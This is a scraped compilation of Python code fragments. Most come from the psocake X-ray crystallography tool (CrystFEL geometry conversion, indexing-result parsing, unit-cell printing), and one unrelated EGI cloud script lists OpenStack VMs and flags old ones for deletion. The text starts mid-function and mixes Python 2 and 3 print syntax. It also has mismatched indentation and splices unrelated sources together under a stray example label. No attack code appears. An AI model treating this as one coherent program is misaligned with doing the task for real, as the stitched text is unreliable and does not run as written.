                            print "ga = ", str(round(float(self.unitCell[5]), 2)), " deg"
                            print "####################"
                        except:
                            print "Could not print unit cell"
            else:
                print "Indexing requirement not met."
                if self.parent.pk.numPeaksFound < self.minPeaks: print "Decrease minimum number of peaks"
                if self.parent.pk.numPeaksFound > self.maxPeaks: print "Increase maximum number of peaks"
                if self.parent.pk.peaksMaxRes < self.minRes: print "Decrease minimum resolution"
def main():

    # Get the user's settings
    env = get_settings()
    verbose = env["VERBOSE"]
    print("Verbose Level = %s" % colourise("cyan", verbose))

    # Initialize the OIDC token from the EGI AAI Check-In service.
    token = get_OIDC_Token(
        env["checkin_auth_url"],
        env["checkin_client_id"],
        env["checkin_client_secret"],
        env["checkin_refresh_token"],
    )

    # Loading the configuration settings of the EGI training providers
    providers = load_provider_settings(env["PROVIDERS_SETTINGS_FILENAME"])

    for index in range(0, len(providers)):
        # Parsing the providers JSON object
        provider_name = providers[index]["provider"]["hostname"]
        provider_identity = providers[index]["provider"]["identity"]
        provider_compute = providers[index]["provider"]["compute"]
        provider_project_id = providers[index]["provider"]["project_id"]

        print("[.] Reading settings of the resource provider: %s " %
              provider_name)
        print("%s" % json.dumps(providers[index], indent=4, sort_keys=False))

        # Protocol fix:
        if ("INFN-CLOUD-BARI" in provider_name or "BIFI" in provider_name
                or "EODC" in provider_name or "CSTCLOUD-EGI" in provider_name
                or "GWDG-CLOUD" in provider_name):
            protocol = "oidc"
        else:
            protocol = "openid"

        # Retrieve an OpenStack scoped token
        scoped_token = get_scoped_Token(
            provider_identity,
            provider_project_id,
            get_unscoped_Token(provider_identity, token, protocol),
        )

        # print(scoped_token)

        # Get the list of the running servers in the selected provider
        instances = get_running_instances(provider_compute,
                                          provider_project_id, scoped_token)
        # print("\n%s" %json.dumps(instances, indent=4, sort_keys=False))

        index = 1
        if len(instances["servers"]) > 0:
            print(
                "\n[+] Total VM instance(s) running in the resource provider = [#%s]"
                % len(instances["servers"]))
            if verbose == "DEBUG":
                print(instances["servers"])
            for index in range(0, len(instances["servers"])):
                if instances["servers"][index]["links"]:
                    # Get the instance_id
                    instance_id = instances["servers"][index]["id"]

                    # Get the usage data for the server
                    # diagnostics = get_instance_diagnostics(provider_compute, instance_id, scoped_token)
                    # print(diagnostics)

                    # Get the server metadata
                    vm_details = get_instance_metadata(provider_compute,
                                                       instance_id,
                                                       scoped_token)
                    # print("\n%s" %json.dumps(vm_details, indent=4, sort_keys=False))
                    if vm_details:
                        created = vm_details["server"]["created"]
                        status = vm_details["server"]["status"]
                        instance_name = vm_details["server"]["name"]

                        # Retrieve the list of network interfaces of the instance
                        ip_details = get_instance_ip(provider_compute,
                                                     instance_id, scoped_token)
                        # print("\n%s" %json.dumps(ip_details, indent=4, sort_keys=False))
                        for key in ip_details["addresses"]:
                            # Get the nmax of addresses
                            nmax = len(ip_details["addresses"][key])
                            ip_address = ip_details["addresses"][key][
                                nmax - 1]["addr"]

                        # Retrieve the flavor details
                        flavor_id = vm_details["server"]["flavor"]["id"]
                        flavor_details = get_flavor(provider_compute,
                                                    flavor_id, scoped_token)
                        # print("\n%s" %json.dumps(flavor_details, indent=4, sort_keys=False))
                        if flavor_details[0] == 200:
                            flavor_name = flavor_details[1]["flavor"]["name"]
                            flavor_vcpus = flavor_details[1]["flavor"]["vcpus"]
                            flavor_ram = flavor_details[1]["flavor"]["ram"]
                            flavor_disk = flavor_details[1]["flavor"]["disk"]

                        # Print VM instance metadata
                        print("_" + "_" * 60)
                        print("- instance name = %s " % instance_name)
                        print("- instance_id   = %s " % instance_id)
                        if "ACTIVE" in status:
                            color = "green"
                        elif "BUILD" in status:
                            color = "yellow"
                        else:
                            color = "red"
                        print("- status        = %s " %
                              colourise(color, status))
                        print("- ip address    = %s " % ip_address)
                        if flavor_details[0] == 200:
                            print(
                                "- image flavor  = %s with %s vCPU cores, %s of RAM and %sGB of local disk "
                                % (flavor_name, flavor_vcpus, flavor_ram,
                                   flavor_disk))
                        print("- created at    = %s " % created)

                        # Check the lifetime of the running instance
                        created = dt.datetime.strptime(created,
                                                       "%Y-%m-%dT%H:%M:%SZ")
                        created_utc = timezone("UCT").localize(created)
                        time_utc = dt.datetime.now(timezone("UCT"))
                        duration = (time_utc -
                                    created_utc).total_seconds() / 3600
                        print("- elapsed time  = %s (hours)" %
                              format(duration, ".2f"))

                        user_id = vm_details["server"]["user_id"]
                        # Get the (real) user from Keystone
                        user_details = get_user(provider_identity, user_id,
                                                scoped_token)

                        if user_details:
                            username = user_details["user"]["name"]
                            print("- created by    = %s " % username)
                        else:
                            print("- created by    = %s " % user_id)

                        if status == "ACTIVE":
                            if (int(duration) > int(
                                    env["MAX_OFFSET"])) or int(duration) == -1:
                                text = "\n[-] WARNING: The VM instance elapsed time exceed the max offset!"
                                print(colourise("cyan", text))

                                text = (
                                    "[-] Deleting of the instance [%s] in progress..."
                                )
                                print(
                                    highlight(
                                        "red",
                                        text %
                                        instance_id[-36:len(instance_id)],
                                    ))
                                # delete_instance(provider_compute, instance_id, scoped_token)

                        index = index + 1

        else:
            print(
                colourise("yellow",
                          "- No VMs instances found in the resource provider"))

        print("")
Пример #30
0
 def deployCrystfelGeometry(self, arg):
     if arg == self.parent.facilityLCLS:
         self.findPsanaGeometry()
         if self.calibFile is not None and self.parent.writeAccess:
             # Convert psana geometry to crystfel geom
             if ('cspad' in self.parent.detInfo.lower() and 'cxi' in self.parent.experimentName) or \
                ('cspad' in self.parent.detInfo.lower() and 'mfx' in self.parent.experimentName):
                 if '.temp.geom' in self.parent.index.geom:
                     self.parent.index.p9.param(
                         self.parent.index.index_grp,
                         self.parent.index.index_geom_str).setValue(
                             self.parent.psocakeRunDir + '/.temp.geom')
                     cmd = [
                         "psana2crystfel",
                         self.calibPath + '/' + self.calibFile,
                         self.parent.psocakeRunDir + "/.temp.geom",
                         str(self.parent.coffset)
                     ]
                     if self.parent.args.v >= 1: print "cmd: ", cmd
                     try:
                         p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
                         p.communicate()[0]
                         p.stdout.close()
                     except:
                         print highlight(
                             "Warning! deployCrystfelGeometry() failed.",
                             'r', 1)
                     # FIXME: Configure crystfel geom file to read in a mask (crystfel 'mask_file=' broken?)
                     with open(self.parent.psocakeRunDir + '/.temp.geom',
                               'r') as f:
                         lines = f.readlines()
                     newGeom = []
                     for line in lines:
                         if '; mask =' in line:
                             #newGeom.append('mask_file = ' + self.parent.psocakeRunDir + '/staticMask.h5\n')
                             newGeom.append(line.split('; ')[-1])
                         elif '; mask_good =' in line:
                             newGeom.append(line.split('; ')[-1])
                         elif '; mask_bad =' in line:
                             newGeom.append(line.split('; ')[-1])
                         else:
                             newGeom.append(line)
                     with open(self.parent.psocakeRunDir + '/.temp.geom',
                               'w') as f:
                         lines = f.writelines(newGeom)
             elif 'rayonix' in self.parent.detInfo.lower(
             ) and 'mfx' in self.parent.experimentName:
                 if '.temp.geom' in self.parent.index.geom:
                     # Set GUI field to .temp.geom
                     self.parent.index.p9.param(
                         self.parent.index.index_grp,
                         self.parent.index.index_geom_str).setValue(
                             self.parent.psocakeRunDir + '/.temp.geom')
                     cmd = [
                         "psana2crystfel",
                         self.calibPath + '/' + self.calibFile,
                         self.parent.psocakeRunDir + "/.temp.geom",
                         str(self.parent.coffset)
                     ]
                     if self.parent.args.v >= 1: print "cmd: ", cmd
                     try:
                         p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
                         p.communicate()[0]
                         p.stdout.close()
                     except:
                         print highlight(
                             "Warning! deployCrystfelGeometry() failed.",
                             'r', 1)
                     # FIXME: Configure crystfel geom file to read in a mask (crystfel 'mask_file=' broken?)
                     with open(self.parent.psocakeRunDir + '/.temp.geom',
                               'r') as f:
                         lines = f.readlines()
                     newGeom = []
                     for line in lines:
                         if '; mask =' in line:
                             # newGeom.append('mask_file = ' + self.parent.psocakeRunDir + '/staticMask.h5\n')
                             newGeom.append(line.split('; ')[-1])
                         elif '; mask_good =' in line:
                             newGeom.append(line.split('; ')[-1])
                         elif '; mask_bad =' in line:
                             newGeom.append(line.split('; ')[-1])
                         else:
                             newGeom.append(line)
                     with open(self.parent.psocakeRunDir + '/.temp.geom',
                               'w') as f:
                         lines = f.writelines(newGeom)
             elif 'rayonix' in self.parent.detInfo.lower(
             ) and 'xpp' in self.parent.experimentName:
                 if '.temp.geom' in self.parent.index.geom:
                     # Set GUI field to .temp.geom
                     self.parent.index.p9.param(
                         self.parent.index.index_grp,
                         self.parent.index.index_geom_str).setValue(
                             self.parent.psocakeRunDir + '/.temp.geom')
                     cmd = [
                         "psana2crystfel",
                         self.calibPath + '/' + self.calibFile,
                         self.parent.psocakeRunDir + "/.temp.geom",
                         str(self.parent.coffset)
                     ]
                     if self.parent.args.v >= 1: print "cmd: ", cmd
                     try:
                         p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
                         p.communicate()[0]
                         p.stdout.close()
                     except:
                         print highlight(
                             "Warning! deployCrystfelGeometry() failed.",
                             'r', 1)
                     # FIXME: Configure crystfel geom file to read in a mask (crystfel 'mask_file=' broken?)
                     with open(self.parent.psocakeRunDir + '/.temp.geom',
                               'r') as f:
                         lines = f.readlines()
                     newGeom = []
                     for line in lines:
                         if '; mask =' in line:
                             # newGeom.append('mask_file = ' + self.parent.psocakeRunDir + '/staticMask.h5\n')
                             newGeom.append(line.split('; ')[-1])
                         elif '; mask_good =' in line:
                             newGeom.append(line.split('; ')[-1])
                         elif '; mask_bad =' in line:
                             newGeom.append(line.split('; ')[-1])
                         else:
                             newGeom.append(line)
                     with open(self.parent.psocakeRunDir + '/.temp.geom',
                               'w') as f:
                         lines = f.writelines(newGeom)
             else:
                 if self.parent.args.v >= 1:
                     print "deployCrystfelGeometry not implemented", self.parent.detInfo.lower(
                     ), self.parent.experimentName
     elif arg == self.parent.facilityPAL:
         if '.temp.geom' in self.parent.index.geom:
             self.parent.index.p9.param(
                 self.parent.index.index_grp,
                 self.parent.index.index_geom_str).setValue(
                     self.parent.psocakeRunDir + '/.temp.geom')
             # FIXME: Configure crystfel geom file to read in a mask (crystfel 'mask_file=' broken?)
             with open(self.parent.psocakeRunDir + '/.temp.geom', 'r') as f:
                 lines = f.readlines()
             newGeom = []
             for line in lines:
                 if '; mask =' in line:
                     # newGeom.append('mask_file = ' + self.parent.psocakeRunDir + '/staticMask.h5\n')
                     newGeom.append(line.split('; ')[-1])
                 elif '; mask_good =' in line:
                     newGeom.append(line.split('; ')[-1])
                 elif '; mask_bad =' in line:
                     newGeom.append(line.split('; ')[-1])
                 else:
                     newGeom.append(line)
             with open(self.parent.psocakeRunDir + '/.temp.geom', 'w') as f:
                 lines = f.writelines(newGeom)
    def reportResults(self, id, eventNumber, out, err):

        if 'command not found' in err:
            print("######################################################################")
            print(highlight("FATAL ERROR: I can't find indexamajig on this machine. Refer to:      ", 'r', 1))
            print(highlight("https://confluence.slac.stanford.edu/display/PSDM/Psocake+SFX+tutorial", 'r', 1))
            print("######################################################################")

        if self.indexCounter == id: # only report results if id matches current index counter
            mySuccessString = self.getSuccessStr()

            # Read CrystFEL geometry in stream
            if mySuccessString in err:  # success
                if self.parent.args.v >= 1: print("Indexing successful!")
                # Munging geometry file
                f = open(self.parent.index.hiddenCrystfelStream)
                content = f.readlines()
                try:
                    for i, val in enumerate(content):
                        if '----- Begin geometry file -----' in val:
                            startLine = i
                        elif '----- End geometry file -----' in val:
                            endLine = i
                            break
                    geom = content[startLine:endLine]
                    numLines = endLine - startLine
                except:
                    geom = content[0]  # This shouldn't happen
                    numLines = 0
                # Remove comments
                for i in np.arange(numLines - 1, -1, -1):  # Start from bottom
                    if ';' in geom[i].lstrip(' ')[0]: geom.pop(i)

                columns = ['min_fs', 'min_ss', 'max_fs', 'max_ss', 'res', 'fs', 'ss', 'corner_x', 'corner_y']
                columnsScan = ['fsx', 'fsy', 'ssx', 'ssy']
                indexScan = []
                if 'cspad' in self.parent.detInfo.lower():
                    numQuads = 4
                    numAsics = 16
                    for i in np.arange(numQuads):
                        for j in np.arange(numAsics):
                            indexScan.append('q' + str(i) + 'a' + str(j))
                elif 'rayonix' in self.parent.detInfo.lower():
                    numQuads = 1
                    numAsics = 1
                    for i in np.arange(numQuads):
                        for j in np.arange(numAsics):
                            indexScan.append('p' + str(i) + 'a' + str(j))
                elif 'epix10k' in self.parent.detInfo.lower() and '2m' in self.parent.detInfo.lower():
                    numQuads = 16
                    numAsics = 4
                    for i in np.arange(numQuads):
                        for j in np.arange(numAsics):
                            indexScan.append('p' + str(i) + 'a' + str(j))
                elif 'jungfrau4m' in self.parent.detInfo.lower():
                    numQuads = 8
                    numAsics = 8
                    for i in np.arange(numQuads):
                        for j in np.arange(numAsics):
                            indexScan.append('p' + str(i) + 'a' + str(j))

                dfGeom = pd.DataFrame(np.empty((numQuads * numAsics, len(columns))), index=indexScan,
                                      columns=columns)
                dfScan = pd.DataFrame(np.empty((numQuads * numAsics, len(columnsScan))), index=indexScan,
                                      columns=columnsScan)
                counter = 0
                for i in np.arange(numQuads):
                    for j in np.arange(numAsics):
                        myAsic = indexScan[counter]
                        for k in columns:
                            myLine = [s for s in geom if myAsic + '/' + k in s]
                            if myLine:  # sometimes elements in columns can be missing
                                myVal = myLine[-1].split('=')[-1].rstrip().lstrip()
                                if k == 'fs' or k == 'ss':
                                    dfGeom.loc[myAsic, k] = myVal
                                else:
                                    dfGeom.loc[myAsic, k] = float(myVal)
                                if k == 'fs':
                                    fsx = float(myVal.split('x')[0])
                                    fsy = float(myVal.split('x')[-1].split('y')[0])
                                    dfScan.loc[myAsic, 'fsx'] = fsx
                                    dfScan.loc[myAsic, 'fsy'] = fsy
                                elif k == 'ss':
                                    ssx = float(myVal.split('x')[0])
                                    ssy = float(myVal.split('x')[-1].split('y')[0])
                                    dfScan.loc[myAsic, 'ssx'] = ssx
                                    dfScan.loc[myAsic, 'ssy'] = ssy
                            else:
                                if self.parent.args.v >= 1: print(myAsic + '/' + k + " doesn't exist")
                        counter += 1
                f.close()
            else:
                if eventNumber == self.parent.eventNumber: # if user is still on the same event
                    print("Indexing failed")
                    self.drawIndexedPeaks()

            # Read CrystFEL indexed peaks
            if mySuccessString in str(err):  # success
                with open(self.parent.index.hiddenCrystfelStream) as f:
                    content = f.readlines()
                    for i, val in enumerate(content):
                        if 'End of peak list' in val:
                            endLine = i - 1
                        elif 'indexed_by =' in val:
                            self.indexingAlg = val.split('=')[-1]
                        elif 'num_saturated_reflections =' in val:
                            self.numSaturatedPeaks = int(val.split('=')[-1])
                        elif 'lattice_type =' in val:
                            self.latticeType = val.split('=')[-1]
                        elif 'centering =' in val:
                            self.centering = val.split('=')[-1]
                        elif 'unique_axis =' in val:
                            self.uniqueAxis = val.split('=')[-1]
                        elif 'fs/px   ss/px (1/d)/nm^-1   Intensity  Panel' in val:
                            startLine = i + 1
                        elif 'Cell parameters' in val:
                            (_, _, a, b, c, _, al, be, ga, _) = val.split()
                            self.unitCell = (a, b, c, al, be, ga)
                        elif 'diffraction_resolution_limit =' in val:
                            (_, _, _, _, _, resLim, _) = val.split()  # Angstrom
                        elif 'End of reflections' in val:
                            endReflectionLine = i - 1
                        elif '   h    k    l          I   sigma(I)       peak background  fs/px  ss/px panel' in val:
                            startReflectionLine = i + 1
                    numPeaks = endLine - startLine
                    numReflections = endReflectionLine - startReflectionLine

                    columns = ['fs', 'ss', 'res', 'intensity', 'asic']
                    peaks = content[startLine:endLine + 1]
                    myPeaks = []
                    for line in peaks:
                        myPeaks.append(line.split())
                    df = pd.DataFrame(myPeaks, columns=columns, dtype=float)
                    if numReflections > 0:
                        columns = ['h', 'k', 'l', 'I', 'sigma', 'peak', 'background', 'fs', 'ss', 'panel']
                        reflections = content[startReflectionLine:endReflectionLine + 1]
                        myReflections = []
                        for line in reflections:
                            myReflections.append(line.split())
                        dfRefl = pd.DataFrame(myReflections, columns=columns, dtype=float)

                # Convert predicted spots to CrystFEL coordinates
                columnsPeaks = ['x', 'y', 'psocakeX', 'psocakeY']
                dfPeaks = pd.DataFrame(np.empty((numReflections, len(columnsPeaks))), columns=columnsPeaks)
                for i in np.arange(numReflections):
                    myAsic = dfRefl['panel'][i].strip()
                    x = (dfRefl['fs'][i] - dfGeom.loc[myAsic, 'min_fs']) * dfScan.loc[myAsic, 'fsx'] + \
                        (dfRefl['ss'][i] - dfGeom.loc[myAsic, 'min_ss']) * dfScan.loc[myAsic, 'ssx']
                    x += dfGeom.loc[myAsic, 'corner_x']
                    y = (dfRefl['fs'][i] - dfGeom.loc[myAsic, 'min_fs']) * dfScan.loc[myAsic, 'fsy'] + \
                        (dfRefl['ss'][i] - dfGeom.loc[myAsic, 'min_ss']) * dfScan.loc[myAsic, 'ssy']
                    y += dfGeom.loc[myAsic, 'corner_y']
                    dfPeaks['x'][i] = x
                    dfPeaks['y'][i] = y
                # Convert to psocake coordinates
                for i in np.arange(numReflections):
                    dfPeaks['psocakeX'][i] = self.parent.cy - dfPeaks['x'][i]
                    dfPeaks['psocakeY'][i] = self.parent.cx + dfPeaks['y'][i]

                if self.parent.index.showIndexedPeaks and eventNumber == self.parent.eventNumber:
                    # if self.parent.mouse.movie is None: # display gif
                    #    self.parent.mouse.tm.start(3000)  # ms
                    self.parent.index.numIndexedPeaksFound = numReflections
                    self.parent.index.indexedPeaks = dfPeaks[['psocakeX', 'psocakeY']].to_numpy()
                    self.parent.index.drawIndexedPeaks(self.latticeType, self.centering, self.unitCell)
                    try:
                        print("Indexed_by = ", str(self.indexingAlg.strip()))
                        print("####################")
                        print("lattice_type = ", str(self.latticeType.strip()))
                        print("centering = ", str(self.centering.strip()))
                        print("unique_axis = ", str(self.uniqueAxis.strip()))
                        print("a = ", str(round(float(self.unitCell[0]) * 10, 2)), " A")
                        print("b = ", str(round(float(self.unitCell[1]) * 10, 2)), " A")
                        print("c = ", str(round(float(self.unitCell[2]) * 10, 2)), " A")
                        print("al = ", str(round(float(self.unitCell[3]), 2)), " deg")
                        print("be = ", str(round(float(self.unitCell[4]), 2)), " deg")
                        print("ga = ", str(round(float(self.unitCell[5]), 2)), " deg")
                        print("####################")
                    except:
                        print("Could not print unit cell")
        else:
            print("stale indexing results: ", self.indexCounter , id)